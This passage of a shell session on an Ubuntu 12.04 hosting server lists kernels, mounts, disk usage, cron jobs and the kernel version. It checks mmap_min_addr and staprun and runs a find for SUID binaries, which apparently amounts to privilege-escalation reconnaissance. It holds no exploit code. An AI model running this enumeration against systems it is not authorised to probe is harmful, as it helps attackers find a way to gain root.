Oct 16 2014 vmlinuz-3.10.58-timeweb -rw-r--r-- 1 root root 5948224 Mar 3 2015 vmlinuz-3.10.70-timeweb -rw-r--r-- 1 root root 5949952 Jul 3 10:49 vmlinuz-3.10.82-timeweb -rw-r--r-- 1 root root 5951264 Oct 7 13:05 vmlinuz-3.10.90-timeweb -rw-r--r-- 1 root root 5480816 May 20 2013 vmlinuz-3.2.45-timeweb $ lls -la --full-time /lib64 $ lls -la --full-time /lib $ mount /dev/sda1 on / type ext4 (rw,errors=remount-ro) proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) none on /sys/fs/fuse/connections type fusectl (rw) none on /sys/kernel/debug type debugfs (rw) none on /sys/kernel/security type securityfs (rw) udev on /dev type devtmpfs (rw,mode=0755) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=4g) tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755) none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880) none on /run/shm type tmpfs (rw,nosuid,nodev) none on /var/spool/exim4 type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1g) /dev/drbd0 on /home type ext4 (rw,nosuid,noatime,nodiratime,usrjquota=aquota.user,jqfmt=vfsv0,usrquota,discard,_netdev) //172.16.0.30/homes on /mnt/backup type cifs (rw,noexec,nosuid,nodev) $ df -h Filesystem Size Used Avail Use% Mounted on /dev/sda1 46G 24G 20G 55% / udev 32G 12K 32G 1% /dev none 4.0G 579M 3.5G 15% /tmp tmpfs 6.3G 336K 6.3G 1% /run none 5.0M 0 5.0M 0% /run/lock none 32G 24K 32G 1% /run/shm none 1.0G 7.7M 1017M 1% /var/spool/exim4 /dev/drbd0 1.5T 1.3T 170G 88% /home $ cat /etc/issue Ubuntu 12.04.5 LTS \n \l $ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # $ ls -la cron.d total 36 drwxr-xr-x 2 root root 4096 Jul 16 2014 . drwxr-xr-x 138 root root 12288 Oct 8 21:02 .. -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder -rw-r--r-- 1 root root 589 Apr 11 2013 mdadm -rw-r--r-- 1 root root 499 Aug 9 2013 php5 -rw-r----- 1 root root 116 Jul 16 2014 puppet_agent_restart -rw-r--r-- 1 root root 396 Dec 16 2011 sysstat $ ls -la cron.hourly total 20 drwxr-xr-x 2 root root 4096 Aug 22 2013 . drwxr-xr-x 138 root root 12288 Oct 8 21:02 .. -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder $ ls -la cron.monthly total 28 drwxr-xr-x 2 root root 4096 Aug 23 2013 . drwxr-xr-x 138 root root 12288 Oct 8 21:02 .. -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder -rwxr-xr-x 1 root root 1281 May 6 2011 acct -rwxr-xr-x 1 root root 534 Mar 8 2012 debsums $ ls -la cron.weekly total 32 drwxr-xr-x 2 root root 4096 Oct 10 2014 . drwxr-xr-x 138 root root 12288 Oct 8 21:02 .. -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder -rwxr-xr-x 1 root root 730 Dec 31 2011 apt-xapian-index -rwxr-xr-x 1 root root 533 Mar 8 2012 debsums -rwxr-xr-x 1 root root 907 Dec 28 2012 man-db $ cat /proc/version Linux version 3.10.82-timeweb ([email protected]) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #1 SMP Fri Jul 3 10:11:34 MSK 2015 $ cat /proc/sys/vm/mmap_min_addr 65536 $ pwd /etc $ ls -la /usr/bin/staprun $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null -rwsr-xr-x 1 root root 31304 Mar 2 2012 /bin/fusermount -rwsr-xr-x 1 root root 35712 Nov 8 2011 /bin/ping -rwsr-xr-x 1 root root 36832 Sep 13 2012 /bin/su -rwsr-xr-x 1 root root 40256 Nov 8 2011 /bin/ping6 -rwsr-xr-x 1 root root 94792 Jun 18 2014 /bin/mount -rwsr-xr-x 1 root root 69096 Jun 18 2014 /bin/umount -rwsr-xr-x 1 root root 32232 May 17 2013 /sbin/mount.cifs -rwsr-xr-x 1 root root 62400 Jul 29 2011 /usr/bin/mtr -rwsr-xr-x 1 root root 37096 Sep 13 2012 /usr/bin/chsh -rwsr-xr-x 2 root root 71280 Mar 12 2015 /usr/bin/sudoedit -rwsr-xr-x 2 root root 71280 Mar 12 2015 /usr/bin/sudo -rwsr-xr-x 1 root root 42824 Sep 13 2012 /usr/bin/passwd -rwsr-xr-x 1 root root 41832 Sep 13 2012 /usr/bin/chfn -rwsr-sr-x 1 daemon daemon 47928 Oct 25 2011 /usr/bin/at -rwsr-xr-x 1 root root 35712 Nov 8 2009 /usr/bin/tcptraceroute.mt -rwsr-xr-x 1 root root 32352 Sep 13 2012 /usr/bin/newgrp -rwsr-xr-x 1 root root 63848 Sep 13 2012 /usr/bin/gpasswd -rwsr-xr-x 1 root root 18912 Nov 8 2011 /usr/bin/traceroute6.iputils -rwsr-xr-- 1 root dip 321552 Apr 21 20:33 /usr/sbin/pppd -r-sr-x--- 1 root customers 940632 Dec 28 2012 /usr/sbin/exim4 -rwsr-x--- 1 _lldpd adm 55640 Nov 27 2011 /usr/sbin/lldpctl -rwsr-sr-x 1 libuuid libuuid 18856 Jun 18 2014 /usr/sbin/uuidd -rwsr-xr-x 1 root root 10592 Mar 26 2015 /usr/lib/pt_chown -rwsr-xr-- 1 root messagebus 292944 Nov 25 2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 10408 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 240984 Aug 18 05:13 /usr/lib/openssh/ssh-keysign $
